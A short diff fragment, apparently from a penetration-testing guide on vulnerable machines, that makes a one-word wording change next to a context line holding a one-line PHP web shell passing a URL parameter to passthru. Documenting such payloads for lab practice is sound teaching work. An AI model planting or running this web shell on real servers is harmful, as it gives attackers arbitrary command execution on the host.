vk12122/bitvijays.github.io-sphinx/docs/LFC-VulnerableMachines.rst

    <? passthru($_GET["cmd"]); ?>

- which can be accessed by
+ which can then be accessed by

  ::